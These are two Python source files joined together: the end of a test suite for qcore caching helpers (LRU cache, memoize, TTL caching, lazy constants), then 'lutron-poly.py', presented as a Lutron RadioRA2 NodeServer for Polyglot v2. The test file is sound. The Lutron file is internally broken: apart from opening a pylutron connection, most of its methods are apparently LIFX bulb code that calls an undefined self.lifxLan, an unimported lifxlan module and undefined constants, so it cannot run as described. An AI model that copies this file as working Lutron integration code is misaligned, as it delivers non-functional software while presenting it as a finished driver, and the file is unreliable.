lazy_time = lazy_constant.get_value()
with qcore.TimeOffset(qcore.HOUR):
assert_eq(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
lazy_constant.clear()
assert_ne(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
def test_compute_clear(self):
def test_function():
self.is_called = True
return 42
lazy_constant = LazyConstant(test_function)
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
self.is_called = False
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
class TestThreadLocalLazyConstant(object):
def test_thread_locality(self):
lazy_constant = ThreadLocalLazyConstant(threading.current_thread)
results = []
lock = threading.RLock()
def execute():
with lock:
results.append(lazy_constant.get_value())
threads = [threading.Thread(target=execute) for i in range(5)]
[thread.start() for thread in threads]
[thread.join() for thread in threads]
assert_eq(5, len(results))
assert_eq(5, len(set(results)))
def test_not_compute(self):
lazy_constant = ThreadLocalLazyConstant(lambda: not_computed)
assert_is(None, lazy_constant.compute())
assert_is(None, lazy_constant.get_value())
def test_clear(self):
lazy_constant = ThreadLocalLazyConstant(qcore.utime)
lazy_time = lazy_constant.get_value()
with qcore.TimeOffset(qcore.HOUR):
assert_eq(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
lazy_constant.clear()
assert_ne(lazy_time, lazy_constant.get_value(), tolerance=qcore.MINUTE)
def test_compute_clear(self):
def test_function():
self.is_called = True
return 42
lazy_constant = ThreadLocalLazyConstant(test_function)
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
self.is_called = False
assert_eq(42, lazy_constant.compute())
assert self.is_called, 'test_function has not been called'
class TestLRUCache(object):
def test_deletion(self):
# Zero capacity cache is not allowed
with AssertRaises(ValueError):
c = LRUCache(0)
# Capacity = 1
c = LRUCache(1)
c[0] = '0'
c[1] = '1'
assert_eq(1, len(c))
assert_eq('1', c[1])
assert_is(miss, c.get(2))
del c[1]
assert_eq(0, len(c))
# Capacity = 2
c = LRUCache(2)
c[0] = '0'
c[1] = '1'
c[2] = '2'
del c[1]
assert_eq(1, len(c))
assert_is(miss, c.get(1))
assert_eq('2', c[2])
c = LRUCache(2)
c[0] = '0'
c[1] = '1'
c[2] = '2'
del c[2]
assert_eq(1, len(c))
assert_eq('1', c[1])
assert_is(miss, c.get(2))
# Capacity = 3
c = LRUCache(3)
c[0] = '0'
c[1] = '1'
c[2] = '2'
c[3] = '3'
del c[2]
assert_eq(2, len(c))
assert_is(miss, c.get(2))
assert_eq('1', c[1])
assert_eq('3', c[3])
# Deletion of invalid item
with AssertRaises(KeyError):
del c[15]
def test_eviction(self):
on_eviction = MagicMock()
c = LRUCache(1, on_eviction)
c[0] = '0'
c[1] = '1'
assert_eq(1, on_eviction.call_count)
on_eviction.assert_called_once_with(0, '0')
on_eviction.reset_mock()
del c[1]
assert_eq(1, on_eviction.call_count)
on_eviction.assert_called_once_with(1, '1')
def _check_order(self, expected, cache):
items = expected
keys = [item[0] for item in items]
values = [item[1] for item in items]
assert_eq(keys, list(cache))
assert_eq(keys, list(cache.keys()))
assert_eq(values, list(cache.values()))
assert_eq(items, list(cache.items()))
def test_iteration(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
self._check_order([(0, 'a'), (1, 'b'), (2, 'c')], c)
def test_getitem(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
assert_eq(3, c.get_capacity())
self._check_order([(0, 'a'), (1, 'b'), (2, 'c')], c)
# Getting a value should make it MRU
assert_eq('b', c[1])
self._check_order([(0, 'a'), (2, 'c'), (1, 'b')], c)
# Missing value should fail
with AssertRaises(KeyError):
c[100]
def test_get(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
# Getting a value should make it MRU
assert_in(1, c)
assert_eq('b', c.get(1))
self._check_order([(0, 'a'), (2, 'c'), (1, 'b')], c)
# Missing value should have no effect
assert_not_in(100, c)
assert_eq(miss, c.get(100))
self._check_order([(0, 'a'), (2, 'c'), (1, 'b')], c)
def test_sets(self):
c = LRUCache(3)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
# Updating a value should make it MRU
c[0] = 'd'
assert_in(0, c)
self._check_order([(1, 'b'), (2, 'c'), (0, 'd')], c)
# Update order and evict the LRU item
c[3] = 'e'
assert_in(3, c)
self._check_order([(2, 'c'), (0, 'd'), (3, 'e')], c)
def test_clear(self):
on_evict = MagicMock()
c = LRUCache(3, on_evict)
c[0] = 'a'
c[1] = 'b'
c[2] = 'c'
c.clear()
self._check_order([], c)
assert_eq(3, on_evict.call_count)
assert_eq([call(0, 'a'), call(1, 'b'), call(2, 'c')],
on_evict.call_args_list)
def test_lru_cache():
@lru_cache(maxsize=1, key_fn=lambda args, kwargs: args[0] % 2 == 0)
def cube(n):
return n * n * n
assert_eq(1, cube(1))
    # key_fn only looks at parity, so 3 maps to the same key as 1 and this returns the stale cached value
    assert_eq(1, cube(3))
# cache miss
assert_eq(8, cube(2))
# now it's a cache miss
assert_eq(27, cube(3))
class TestClass(object):
__hash__ = None # not hashable
def __init__(self, val):
self.val = val
self.x = 0
@cached_per_instance()
def get_x(self):
self.x += self.val
return self.x
@cached_per_instance()
def with_kwargs(self, x=1, y=2, z=3):
self.x += (x + y + z)
return self.x
def test_cached_per_instance():
get_x_cache = TestClass.get_x.__cached_per_instance_cache__
with_kwargs_cache = TestClass.with_kwargs.__cached_per_instance_cache__
assert_eq(0, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
object1 = TestClass(1)
object2 = TestClass(2)
assert_eq(object1.x, 0)
assert_eq(object2.x, 0)
assert_eq(object1.get_x(), 1)
assert_eq(1, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
assert_eq(object1.x, 1)
assert_eq(object2.x, 0)
assert_eq(object1.get_x(), 1)
assert_eq(1, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
assert_eq(object1.x, 1)
assert_eq(object2.x, 0)
assert_eq(object2.get_x(), 2)
assert_eq(2, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
assert_eq(object1.x, 1)
assert_eq(object2.x, 2)
assert_eq(7, object1.with_kwargs())
assert_eq(7, object1.with_kwargs(x=1))
assert_eq(7, object1.with_kwargs())
assert_eq(16, object1.with_kwargs(x=3, y=3, z=3))
assert_eq(2, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(1, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
del object1
assert_eq(1, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
del object2
assert_eq(0, len(get_x_cache), extra=repr(get_x_cache))
assert_eq(0, len(with_kwargs_cache), extra=repr(with_kwargs_cache))
class PickleTestClass(object):
@cached_per_instance()
def f(self, x):
return x
def test_cached_per_instance_pickling():
# make sure cached stuff doesn't appear in the pickled representation
obj = PickleTestClass()
obj.attr = 'spam'
assert_eq(set(), set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
obj.f('my hovercraft is full of eels')
assert_eq({id(obj)}, set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
serialized = pickle.dumps(obj)
assert_not_in(b'my hovercraft is full of eels', serialized)
assert_in(b'spam', serialized)
restored = pickle.loads(serialized)
assert_eq({id(obj)}, set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
restored.f('my hovercraft is full of eels')
assert_eq({id(obj), id(restored)}, set(PickleTestClass.f.__cached_per_instance_cache__.keys()))
assert_eq('spam', obj.attr)
# make sure we can use this with a custom __getstate__
class X(object):
@cached_per_instance()
def f(self, x):
return x
def __getstate__(self):
return {}
X().f(1)
x = 0
@memoize
def cached_fn(y, z=4):
global x
x += 1
return y * z
memoize_fns = [cached_fn]
try:
exec("""
@memoize
def cached_fn_with_annotations(y: int, z: int=4) -> int:
global x
x += 1
return y * z
@memoize
def cached_fn_with_kwonly_args(y, *, z):
global x
x += 1
return y * z
""")
except SyntaxError:
pass
else:
memoize_fns.append(cached_fn_with_annotations)
def test_memoize_with_kwonly_args():
global x
x = 0
with AssertRaises(TypeError):
cached_fn_with_kwonly_args(1)
with AssertRaises(TypeError):
cached_fn_with_kwonly_args(1, 2)
assert_eq(0, x)
assert_eq(4, cached_fn_with_kwonly_args(2, z=2))
assert_eq(1, x)
assert_eq(4, cached_fn_with_kwonly_args(z=2, y=2))
assert_eq(1, x)
assert_eq(8, cached_fn_with_kwonly_args(2, z=4))
assert_eq(2, x)
assert_eq(8, cached_fn_with_kwonly_args(y=2, z=4))
assert_eq(2, x)
cached_fn_with_kwonly_args.clear_cache()
assert_eq(4, cached_fn_with_kwonly_args(2, z=2))
assert_eq(3, x)
@memoize_with_ttl(ttl_secs=500)
def cached_fn_with_ttl(y, z=4):
global x
x += 1
return y * z
@memoize_with_ttl(ttl_secs=500)
def cached_fn_with_ttl_unhashable(y, z={'a': 1, 'b': 2, 'c': 3}):
global x
x += 1
return y * (z['a'] + z['b'] + z['c'])
def test_memoize():
"""Test Caching with no Time-To-Live (TTL)."""
global x
for fn in memoize_fns:
x = 0
assert_eq(4, fn(1))
assert_eq(1, x)
assert_eq(8, fn(2, 4))
assert_eq(2, x)
# should not result in another call
assert_eq(8, fn(2, z=4))
assert_eq(2, x)
assert_eq(8, fn(y=2, z=4))
assert_eq(2, x)
fn.clear_cache()
assert_eq(4, fn(1))
assert_eq(3, x)
def test_memoize_with_ttl():
"""Test Caching with Time-To-Live (TTL)."""
global x
x = 0
then = 10000
just_after = 10005
now = 10700
with mock.patch('time.time') as mock_time:
mock_time.return_value = then
assert_eq(4, cached_fn_with_ttl(1))
assert_eq(1, x)
with mock.patch('time.time') as mock_time:
mock_time.return_value = just_after
assert_eq(8, cached_fn_with_ttl(2, 4))
assert_eq(2, x)
# should not result in another call
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(2, x)
assert_eq(8, cached_fn_with_ttl(y=2, z=4))
assert_eq(2, x)
# after the ttl expires, should result in another call
with mock.patch('time.time') as mock_time:
mock_time.return_value = now
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(3, x)
assert_eq(8, cached_fn_with_ttl(y=2, z=4))
assert_eq(3, x)
cached_fn_with_ttl.clear_cache()
assert_eq(4, cached_fn_with_ttl(1))
assert_eq(4, x)
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(5, x)
# test dirtying a key.
# first, the key should be cached
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(5, x)
cached_fn_with_ttl.dirty(2, z=4)
# now, we should recompute the function
assert_eq(8, cached_fn_with_ttl(2, z=4))
assert_eq(6, x)
def test_memoize_with_ttl_unhashable():
"""Test Caching with TTL using dictionary arguments."""
global x
x = 0
assert_eq(12, cached_fn_with_ttl_unhashable(2))
assert_eq(1, x)
assert_eq(10, cached_fn_with_ttl_unhashable(1, z={'a': 2, 'b': 3, 'c': 5}))
assert_eq(2, x)
# should not result in another call
assert_eq(10, cached_fn_with_ttl_unhashable(1, z={'a': 2, 'b': 3, 'c': 5}))
assert_eq(2, x)
assert_eq(12, cached_fn_with_ttl_unhashable(2, z={'a': 1, 'b': 2, 'c': 3}))
assert_eq(2, x)
cached_fn_with_ttl_unhashable.clear_cache()
assert_eq(12, cached_fn_with_ttl_unhashable(2))
assert_eq(3, x)
|
lutron-poly.py
|
#!/usr/bin/env python3
"""
Lutron RadioRA2 NodeServer for UDI Polyglot v2
by Einstein.42 (James Milne) milne.james@gmail.com
"""
import polyinterface
import time
import sys
from copy import deepcopy
import json
import pylutron
from threading import Thread
from pathlib import Path
import math
LOGGER = polyinterface.LOGGER
with open('server.json') as data:
SERVERDATA = json.load(data)
data.close()
try:
VERSION = SERVERDATA['credits'][0]['version']
except (KeyError, ValueError):
LOGGER.info('Version not found in server.json.')
VERSION = '0.0.0'
class Controller(polyinterface.Controller):
def __init__(self, polyglot):
super().__init__(polyglot)
self.lutron = None
self.name = 'Lutron RadioRA2'
self.discovery_thread = None
self.update_nodes = False
self.master_repeater_ip = None
self.username = 'lutron'
self.password = 'integration'
def start(self):
LOGGER.info(f'Starting {self.name} Polyglot v2 NodeServer ')
if 'username' in self.polyConfig['customParams']:
self.username = self.polyConfig['customParams']['username']
LOGGER.debug(f'Username overridden to {self.username}')
if 'password' in self.polyConfig['customParams']:
self.password = self.polyConfig['customParams']['password']
LOGGER.debug('Password overridden.')
        if 'main_repeater_ip' not in self.polyConfig['customParams']:
            LOGGER.fatal('main_repeater_ip must be specified.')
            return False
        self.master_repeater_ip = self.polyConfig['customParams']['main_repeater_ip']
self._checkProfile()
self.discover()
LOGGER.debug('Start complete')
def stop(self):
LOGGER.info(f'Stopping {self.name} Polyglot v2 NodeServer')
# TODO: Do we need this?
def _checkProfile(self):
profile_version_file = Path('profile/version.txt')
if profile_version_file.is_file() and 'customData' in self.polyConfig:
with profile_version_file.open() as f:
profile_version = f.read().replace('\n', '')
f.close()
if 'prof_ver' in self.polyConfig['customData']:
if self.polyConfig['customData']['prof_ver'] != profile_version:
self.update_nodes = True
else:
self.update_nodes = True
if self.update_nodes:
LOGGER.info('New Profile Version detected: {}, all nodes will be updated'.format(profile_version))
cust_data = deepcopy(self.polyConfig['customData'])
cust_data['prof_ver'] = profile_version
self.saveCustomData(cust_data)
self.updateNode(self)
def shortPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.is_alive():
LOGGER.debug('Skipping shortPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].update()
def longPoll(self):
if self.discovery_thread is not None:
if self.discovery_thread.is_alive():
LOGGER.debug('Skipping longPoll() while discovery in progress...')
return
else:
self.discovery_thread = None
for node in self.nodes:
self.nodes[node].long_update()
def update(self):
pass
def long_update(self):
pass
def discover(self, command=None):
self.lutron = pylutron.Lutron(self.master_repeater_ip, self.username, self.password)
if self.discovery_thread is not None:
if self.discovery_thread.is_alive():
LOGGER.info('Discovery is still in progress')
return
self.discovery_thread = Thread(target=self._discovery_process)
self.discovery_thread.start()
def _discovery_process(self):
LOGGER.info('Starting Lutron RadioRA2 Discovery thread...')
try:
devices = self.lifxLan.get_lights()
LOGGER.info('{} bulbs found. Checking status and adding to ISY if necessary.'.format(len(devices)))
for d in devices:
label = str(d.get_label())
name = 'LIFX {}'.format(label)
address = d.get_mac_addr().replace(':', '').lower()
if not address in self.nodes:
self.bulbs_found += 1
if d.supports_multizone():
LOGGER.info('Found MultiZone Bulb: {}({})'.format(name, address))
self.addNode(MultiZone(self, self.address, address, name, d), update=self.update_nodes)
else:
LOGGER.info('Found Bulb: {}({})'.format(name, address))
self.addNode(Light(self, self.address, address, name, d), update=self.update_nodes)
gid, glabel, gupdatedat = d.get_group_tuple()
gaddress = glabel.replace("'", "").replace(' ', '').lower()[:12]
if not gaddress in self.nodes:
LOGGER.info('Found LiFX Group: {}'.format(glabel))
self.addNode(Group(self, self.address, gaddress, glabel), update=self.update_nodes)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('discovery Error: {}'.format(ex))
self.update_nodes = False
try:
old_bulbs_found = int(self.getDriver('GV0'))
except (TypeError, ValueError):
old_bulbs_found = self.bulbs_found
else:
if self.bulbs_found != old_bulbs_found:
LOGGER.info(
'NOTICE: Bulb count {} is different, was {} previously'.format(self.bulbs_found, old_bulbs_found))
self.setDriver('GV0', self.bulbs_found)
LOGGER.info('Discovery thread is complete.')
def all_on(self, command):
try:
self.lifxLan.set_power_all_lights("on", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All On Error: {}'.format(str(ex)))
def all_off(self, command):
try:
self.lifxLan.set_power_all_lights("off", rapid=True)
except (lifxlan.WorkflowException, OSError, IOError, TypeError) as ex:
LOGGER.error('All Off Error: {}'.format(str(ex)))
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color,
wf_period,
wf_cycles,
wf_duty_cycle,
WAVEFORM[
wf_form],
wf_transient))
try:
self.lifxLan.set_waveform_all_lights(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting Waveform for all lights: {}'.format(str(ex)))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxLan.set_color_all_lights(COLORS[_color][1], rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
LOGGER.info('Received manual change, updating all bulb to: {} duration: {}'.format(str(color), duration))
except TypeError:
duration = 0
try:
self.lifxLan.set_color_all_lights(color, duration=duration, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error('Connection Error on setting all bulb color: {}'.format(str(ex)))
drivers = [{'driver': 'ST', 'value': 1, 'uom': 2},
{'driver': 'GV0', 'value': 0, 'uom': 56}
]
id = 'controller'
commands = {'DISCOVER': discover, 'DON': all_on, 'DOF': all_off,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD, 'WAVEFORM': set_wf
}
class Light(polyinterface.Node):
"""
LiFX Light Parent Class
"""
def __init__(self, controller, primary, address, name, dev):
super().__init__(controller, primary, address, name)
self.device = dev
self.name = name
self.power = False
self.connected = 1
self.uptime = 0
self.color = []
self.lastupdate = time.time()
self.duration = 0
self.ir_support = False
def start(self):
try:
self.duration = int(self.getDriver('RR'))
except (TypeError, ValueError):
self.duration = 0
self.update()
self.long_update()
def query(self, command=None):
self.update()
self.long_update()
self.reportDrivers()
def update(self):
self.connected = 0
try:
self.color = list(self.device.get_color())
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
''' stop here as proceeding without self.color may cause exceptions '''
self.setDriver('GV5', self.connected)
return
else:
self.connected = 1
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
try:
power_now = True if self.device.get_power() == 65535 else False
if self.power != power_now:
if power_now:
self.reportCmd('DON')
else:
self.reportCmd('DOF')
self.power = power_now
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
if self.power:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
else:
self.setDriver('ST', 0)
self.setDriver('GV5', self.connected)
self.setDriver('RR', self.duration)
self.lastupdate = time.time()
def long_update(self):
self.connected = 0
try:
self.uptime = self._nanosec_to_hours(self.device.get_uptime())
self.ir_support = self.device.supports_infrared()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb uptime. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.setDriver('GV6', self.uptime)
if self.ir_support:
try:
ir_brightness = self.device.get_infrared()
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb Infrared. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.setDriver('GV7', ir_brightness)
else:
self.setDriver('GV7', 0)
try:
wifi_signal = math.floor(10 * math.log10(self.device.get_wifi_signal_mw()) + 0.5)
except (lifxlan.WorkflowException, OSError, ValueError) as ex:
LOGGER.error(
'Connection Error on getting {} bulb WiFi signal strength. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.connected = 1
self.setDriver('GV0', wifi_signal)
self.setDriver('GV5', self.connected)
self.lastupdate = time.time()
def _nanosec_to_hours(self, ns):
return int(round(ns / (1000000000.0 * 60 * 60)))
def _bri_to_percent(self, bri):
return float(round(bri * 100 / 65535, 4))
def _power_on_change(self):
if not self.controller.change_pon or self.power:
return
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOn(self, command):
cmd = command.get('cmd')
val = command.get('value')
new_bri = None
if cmd == 'DFON' and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = 0
elif cmd == 'DON' and val is not None:
new_bri = int(round(int(val) * 65535 / 255))
if new_bri > BR_MAX:
new_bri = BR_MAX
elif new_bri < BR_MIN:
new_bri = BR_MIN
trans = self.duration
elif self.power and self.controller.ignore_second_on:
LOGGER.info('{} is already On, ignoring DON'.format(self.name))
return
elif self.power and self.color[2] != BR_MAX:
new_bri = BR_MAX
trans = self.duration
if new_bri is not None:
self.color[2] = new_bri
try:
self.device.set_color(self.color, trans, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error DON {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('GV3', self.color[2])
try:
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
def setOff(self, command):
try:
self.device.set_power(False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = False
self.setDriver('ST', 0)
def dim(self, command):
if self.power is False:
LOGGER.info('{} is off, ignoring DIM'.format(self.name))
return
new_bri = self.color[2] - BR_INCREMENT
if new_bri < BR_MIN:
new_bri = BR_MIN
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def brighten(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
return
new_bri = self.color[2] + BR_INCREMENT
if new_bri > BR_MAX:
new_bri = BR_MAX
self.color[2] = new_bri
try:
self.device.set_color(self.color, BRTDIM_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on dimming {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('ST', self._bri_to_percent(self.color[2]))
self.setDriver('GV3', self.color[2])
def fade_up(self, command):
if self.power is False:
# Bulb is currently off, let's turn it on ~2%
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, 0, rapid=False)
self.device.set_power(True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on brightening {} bulb. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.power = True
self.setDriver('ST', self._bri_to_percent(self.color[2]))
if self.color[2] == BR_MAX:
LOGGER.info('{} Can not FadeUp, already at maximum'.format(self.name))
return
self.color[2] = BR_MAX
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Up. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_down(self, command):
if self.power is False:
LOGGER.error('{} can not FadeDown as it is currently off'.format(self.name))
return
if self.color[2] <= BR_MIN:
LOGGER.error('{} can not FadeDown as it is currently at minimum'.format(self.name))
return
self.color[2] = BR_MIN
try:
self.device.set_color(self.color, FADE_INTERVAL, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Down. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def fade_stop(self, command):
if self.power is False:
LOGGER.error('{} can not FadeStop as it is currently off'.format(self.name))
return
# check current brightness level
try:
self.color = list(self.device.get_color())
except Exception as ex:
LOGGER.error(
'Connection Error on getting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
if self.color[2] == BR_MIN or self.color[2] == BR_MAX:
LOGGER.error('{} can not FadeStop as it is currently at limit'.format(self.name))
return
try:
self.device.set_color(self.color, 0, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error {} bulb Fade Stop. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def setColor(self, command):
if self.connected:
_color = int(command.get('value'))
try:
self.device.set_color(COLORS[_color][1], duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
LOGGER.info('Received SetColor command from ISY. Changing color to: {}'.format(COLORS[_color][0]))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, COLORS[_color][1][ind])
self._power_on_change()
else:
LOGGER.error('Received SetColor, however the bulb is in a disconnected state... ignoring')
def setManual(self, command):
if self.connected:
_cmd = command.get('cmd')
_val = int(command.get('value'))
if _cmd == 'SETH':
self.color[0] = _val
driver = ['GV1', self.color[0]]
elif _cmd == 'SETS':
self.color[1] = _val
driver = ['GV2', self.color[1]]
elif _cmd == 'SETB':
self.color[2] = _val
driver = ['GV3', self.color[2]]
elif _cmd == 'CLITEMP':
self.color[3] = _val
driver = ['CLITEMP', self.color[3]]
elif _cmd == 'RR':
self.duration = _val
driver = ['RR', self.duration]
try:
self.device.set_color(self.color, self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb {}. This happens from time to time, normally safe to ignore. {}'.format(
self.name, _cmd, str(ex)))
LOGGER.info(
'Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
if driver:
self.setDriver(driver[0], driver[1])
self._power_on_change()
else:
LOGGER.info('Received manual change, however the bulb is in a disconnected state... ignoring')
def setHSBKD(self, command):
query = command.get('query')
try:
self.color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
self.duration = int(query.get('D.uom42'))
LOGGER.info(
'Received manual change, updating the bulb to: {} duration: {}'.format(str(self.color), self.duration))
except TypeError:
self.duration = 0
try:
self.device.set_color(self.color, duration=self.duration, rapid=False)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb color. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
for ind, driver in enumerate(('GV1', 'GV2', 'GV3', 'CLITEMP')):
self.setDriver(driver, self.color[ind])
self._power_on_change()
self.setDriver('RR', self.duration)
def set_ir_brightness(self, command):
_val = int(command.get('value'))
if not self.ir_support:
LOGGER.error('{} is not IR capable'.format(self.name))
return
try:
self.device.set_infrared(_val)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb IR Brightness. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
else:
self.setDriver('GV7', _val)
def set_wf(self, command):
WAVEFORM = ['Saw', 'Sine', 'HalfSine', 'Triangle', 'Pulse']
if self.power is False:
LOGGER.error('{} can not run Waveform as it is currently off'.format(self.name))
return
query = command.get('query')
wf_color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
wf_period = int(query.get('PE.uom42'))
wf_cycles = int(query.get('CY.uom56'))
wf_duty_cycle = int(query.get('DC.uom56'))
wf_form = int(query.get('WF.uom25'))
if wf_form >= 5:
wf_transient = 1
wf_form -= 5
else:
wf_transient = 0
LOGGER.debug('Color tuple: {}, Period: {}, Cycles: {}, Duty cycle: {}, Form: {}, Transient: {}'.format(wf_color,
wf_period,
wf_cycles,
wf_duty_cycle,
WAVEFORM[
wf_form],
wf_transient))
try:
self.device.set_waveform(wf_transient, wf_color, wf_period, wf_cycles, wf_duty_cycle, wf_form)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Connection Error on setting {} bulb Waveform. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
